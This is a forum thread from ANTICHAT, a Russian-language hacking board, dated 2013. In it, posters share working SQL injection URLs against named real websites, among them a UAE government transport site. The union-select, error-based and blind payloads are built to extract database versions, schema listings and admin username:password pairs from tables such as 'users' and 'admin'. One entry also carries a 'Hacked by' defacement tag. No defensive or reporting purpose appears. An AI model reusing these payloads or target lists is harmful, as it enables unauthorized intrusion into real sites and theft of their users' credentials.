HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #15611  
Старый 12.08.2013, 22:48
Unknown
Guest
Сообщений: n/a
Провел на форуме:
77731

Репутация: 33
По умолчанию

Код:
Code:
http://vniispk.ru/news/konferenciya_2008/article.php?id=-6+and+1=0+Union+Select+1,2,3,4,5,0x4861636b6564206279205365706f,7,8--
 
Ответить с цитированием

  #15612  
Старый 13.08.2013, 14:09
YaBtr
Guest
Сообщений: n/a
Провел на форуме:
132418

Репутация: 652
По умолчанию

Цитата:
Сообщение от None  
http://
www.vinta.ru
/humor.php?act=show&id=520+and+1=2+union+select+1,2 ,version(),group_concat(usertype,0x3a,username,0x3 a,password),5 from zolotykh_users +--+&width=1467
================================

Цитата:
Сообщение от None  
http://
www.belrotaryplunge.com
/participant.php?id=31'+and+1=2+union+select+1,2,3, 4,5,6,7,8,9,10,11,12,13,14,15,16,group_concat(user name,0x3a,password),18,19,20,21,22,23,24,25,26,27, 28,29 from users+--+
================================

Цитата:
Сообщение от None  
http://
www.juinanews.com.br
/humor.php?id=4 and(substr(version(),1,1)=5) and 1 --+
================================

Цитата:
Сообщение от None  
http://
www.rycorealty.com
/clientAdvantageNetwork/participant.php?id=-43+union+select+1,2,3,4,(select(@x) from( select (@x:=0x00),(select(0)from(information_schema.colum ns)where(table_schema=database())and(0x00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0 x3a,column_name))))antichat),6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22 --+
================================

Цитата:
Сообщение от None  
http://
www.imcconcerts.com
/tour.php?id=12+and+1=2+union+select+1,2,(select(@x ) from( select (@x:=0x00),(select(0)from(information_schema.colum ns)where(table_schema=database())and(0x00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0 x3a,column_name))))antichat),4,5,6,7,8,9,10,11,12, 13,14,15,16 --+
================================
 
Ответить с цитированием

  #15613  
Старый 14.08.2013, 12:15
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию

тиц 2900

Код HTML:
HTML:
http://rzd.inte[google]rgid.ru/index.php
уязвимы поля "Откуда" и "Куда", выводит сразу же

Пример "'union select version() -- "

5.5.13-log

LIST_CITYES@xml.biletix.ru
 
Ответить с цитированием

  #15614  
Старый 14.08.2013, 16:41
YaBtr
Guest
Сообщений: n/a
Провел на форуме:
132418

Репутация: 652
По умолчанию

Цитата:
Сообщение от None  
http://
www.m.go4bike.com
/opinions.php?id=404'+and+1=0+union+select+1,2,3,4, 5,group_concat(loginname,0x3a,password),7,8,9 from admin --+
================================

pr=2

Цитата:
Сообщение от None  
http://
www.sunbelt-reps.com
/territory.php?id=2+and+1=2+union+select+1,group_co ncat(cal_login,0x3a,cal_passwd),3,4,5,6,7,8 from webcal_user --+
================================

Цитата:
Сообщение от None  
http://
www.jboiler.ru
/catalog/seria.php?se=-6+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,(select( @x) from( select (@x:=0x00),(select(0)from(information_schema.colum ns)where(table_schema=database())and(0x00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0 x3a,column_name))))antichat),19,20,21,22,23,24 --+
================================
 
Ответить с цитированием

  #15615  
Старый 15.08.2013, 00:46
Unknown
Guest
Сообщений: n/a
Провел на форуме:
77731

Репутация: 33
По умолчанию

Код:
Code:
http://www.bullydog.com/preferred_dealer.php?dealer=-1+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,0x4861636b6564206279205365706f--
 
Ответить с цитированием

  #15616  
Старый 15.08.2013, 14:40
YaBtr
Guest
Сообщений: n/a
Провел на форуме:
132418

Репутация: 652
По умолчанию

Цитата:
Сообщение от None  
http://
www.twitney.co.uk
/theme.php?id=7+and+row(1,1)>(select+count(*),conca t((select +version()),0x3a,database(),0x3a,user(),floor(rand (0)*2)) x from information_schema.tables group by x )
================================

blind, mysql 5 ветки

Цитата:
Сообщение от None  
http://
www.guidesonthefly.com
/river.php?id=39 and substring((version()),1,1)=5
================================

Цитата:
Сообщение от None  
http://
www.vikon-ryad.com.ua
/dveri-terminus-seria.php?id=-1'+union+select+1,2,3,4,5,concat_ws(0x3a, version(),database(),user()) --+
================================
 
Ответить с цитированием

  #15617  
Старый 16.08.2013, 16:36
YaBtr
Guest
Сообщений: n/a
Провел на форуме:
132418

Репутация: 652
По умолчанию

Цитата:
Сообщение от None  
http://
www.detkinashi.ru
/chap.php?id=-6+union+select+1,(select( @x) from( select (@x:=0x00),(select(0)from(information_schema.colum ns)where(table_schema=database())and(0x00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0 x3a,column_name))))antichat),3,4,5,6,7,8 --+
================================

pr=4, blind, mysql 5 версии

Цитата:
Сообщение от None  
http://
www.trim.no
/pub/art.php?id=1189' and (substring(database(),1,1))='a' and '1
 
Ответить с цитированием

  #15618  
Старый 16.08.2013, 18:04
Unknowhacker
Guest
Сообщений: n/a
Провел на форуме:
94006

Репутация: 24
По умолчанию

Фотограф Павел Киселёв (смотреть title)

Код:
Code:
http://www.photokiselev.com/info.php?CID=-3+union+select+1,2,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28u36043.student%29where%280x00%29in%28@x:=concat%28@x,0x3c62723e,login,0x3a,pass%29%29%29%29x%29,4,5,6,7,8,9+--+
Еженедельная Газета "Центр Города" (Наро-Фоминск)

Код:
Code:
http://cgnf.ru/rubric.php?id=2112+and+1=2+union+select+1,2,3,4,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28cgnf.tch_users%29where%280x00%29in%28@x:=concat%28@x,user_login,0x3a,user_password%29%29%29%29x%29,6,7,8,9+--+
См. исходный код страницы 254 строка.
 
Ответить с цитированием

  #15619  
Старый 17.08.2013, 00:36
Unknown
Guest
Сообщений: n/a
Провел на форуме:
77731

Репутация: 33
По умолчанию

GOV

SHARJAH INTERCITY TRANSPORT

Код:
Code:
http://www.stc.gov.ae/en/transport-intercity-routes-result.php?id=-112+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13--
 
Ответить с цитированием

  #15620  
Старый 17.08.2013, 16:45
Unknowhacker
Guest
Сообщений: n/a
Провел на форуме:
94006

Репутация: 24
По умолчанию

Notoriety Inc.

Код:
Code:
http://www.hanhdance.com/contact.php?id=-46+union+select+1,2,3,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28hanhdanceeditor.admin_users%29where%280x00%29in%28@x:=concat%28@x,0x3c62723e,username,0x3a,password%29%29%29%29x%29,5,6,7,8+--+
.:Урукхаи:.

Код:
Code:
http://www.urukhai.ru/comment.php?id=59%27+union+select+1,2,3,4,version%28%29,6,7+--+
4.1.22-lk-log
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ